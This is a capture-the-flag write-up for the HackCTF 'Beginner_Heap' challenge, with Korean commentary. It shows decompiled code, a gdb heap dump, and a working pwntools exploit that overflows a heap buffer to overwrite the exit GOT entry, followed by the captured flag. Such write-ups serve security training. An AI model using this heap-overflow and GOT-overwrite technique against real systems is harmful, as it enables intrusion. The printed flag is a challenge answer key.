[HackCTF / pwnable] Beginner_Heap

HackCTF - Beginner_Heap

Summary

• 64bit

• heap overflow

Analysis

main

void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
  void *v3; // ST10_8
  void *v4; // ST18_8
  char s; // [rsp+20h] [rbp-1010h]
  unsigned __int64 v6; // [rsp+1028h] [rbp-8h]
​
  v6 = __readfsqword(0x28u);
  v3 = malloc(0x10uLL);
  *v3 = 1;
  *(v3 + 1) = malloc(8uLL);
  v4 = malloc(0x10uLL);
  *v4 = 2;
  *(v4 + 1) = malloc(8uLL);
  fgets(&s, 4096, stdin);
  strcpy(*(v3 + 1), &s);
  fgets(&s, 4096, stdin);
  strcpy(*(v4 + 1), &s);
  exit(0);
}

0x400826

void __noreturn sub_400826()
{
  __int128 lineptr; // [rsp+0h] [rbp-20h]
  FILE *stream; // [rsp+10h] [rbp-10h]
  unsigned __int64 v2; // [rsp+18h] [rbp-8h]
​
  v2 = __readfsqword(0x28u);
  lineptr = 0uLL;
  stream = fopen("flag", "r");
  getline(&lineptr, &lineptr + 1, stream);
  puts(lineptr);
  fflush(stdout);
  free(lineptr);
  _exit(1);
}

[----------------------------------registers-----------------------------------]
RAX: 0x602070 --> 0x0 
RBX: 0x0 
RCX: 0x7ffff7dd1b20 --> 0x100000000 
RDX: 0x602070 --> 0x0 
RSI: 0x602080 --> 0x0 
RDI: 0x0 
RBP: 0x7fffffffe430 --> 0x4009c0 (push   r15)
RSP: 0x7fffffffd400 --> 0x7fffffffe518 --> 0x7fffffffe752 ("/home/cg10036/CTF/hackCTF/Beginner_Heap/beginner_heap")
RIP: 0x40092d (mov    rdx,rax)
R8 : 0x602000 --> 0x0 
R9 : 0xd ('\r')
R10: 0x7ffff7dd1b78 --> 0x602080 --> 0x0 
R11: 0x0 
R12: 0x400730 (xor    ebp,ebp)
R13: 0x7fffffffe510 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40091d:    mov    DWORD PTR [rax],0x2
   0x400923:    mov    edi,0x8
   0x400928:    call   0x4006d0 <malloc@plt>
=> 0x40092d:    mov    rdx,rax
   0x400930:    mov    rax,QWORD PTR [rbp-0x1018]
   0x400937:    mov    QWORD PTR [rax+0x8],rdx
   0x40093b:    mov    rdx,QWORD PTR [rip+0x20074e]        # 0x601090 <stdin>
   0x400942:    lea    rax,[rbp-0x1010]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffd400 --> 0x7fffffffe518 --> 0x7fffffffe752 ("/home/cg10036/CTF/hackCTF/Beginner_Heap/beginner_heap")
0008| 0x7fffffffd408 --> 0x100000000 
0016| 0x7fffffffd410 --> 0x602010 --> 0x1 
0024| 0x7fffffffd418 --> 0x602050 --> 0x2 
0032| 0x7fffffffd420 --> 0x0 
0040| 0x7fffffffd428 --> 0x0 
0048| 0x7fffffffd430 --> 0x0 
0056| 0x7fffffffd438 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x000000000040092d in ?? ()
gdb-peda$ parseheap 
addr                prev                size                 status              fd                bk                
0x602000            0x0                 0x20                 Used                None              None
0x602020            0x0                 0x20                 Used                None              None
0x602040            0x0                 0x20                 Used                None              None
0x602060            0x0                 0x20                 Used                None              None

malloc을 할때 각각 0x20씩 할당이 되었다. *(v3 + 1)이 0x602020일것이고 덮어야할곳은 *(v4 + 1), 0x602040+8이다.

총 (0x20+0x8)을 덮고 exit got를 0x400826로 변조하면 된다.

Exploit

from pwn import *
​
e = ELF("./beginner_heap")
#p = process("./beginner_heap")
p = remote("ctf.j0n9hyun.xyz", 3016)
​
payload = ""
payload += "A"*(0x20+0x8)
payload += p64(e.got["exit"])
​
p.sendline(payload)
p.sendline(p64(0x400826))
​
p.interactive()

Flag

cg10036@cg10036-virtual-machine:~/CTF/hackCTF/Beginner_Heap$ p ex.py 
[*] '/home/cg10036/CTF/hackCTF/Beginner_Heap/beginner_heap'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to ctf.j0n9hyun.xyz on port 3016: Done
[*] Switching to interactive mode
HackCTF{4r3_y0u_r34dy_w3lc0m3_70_h34p_53k41}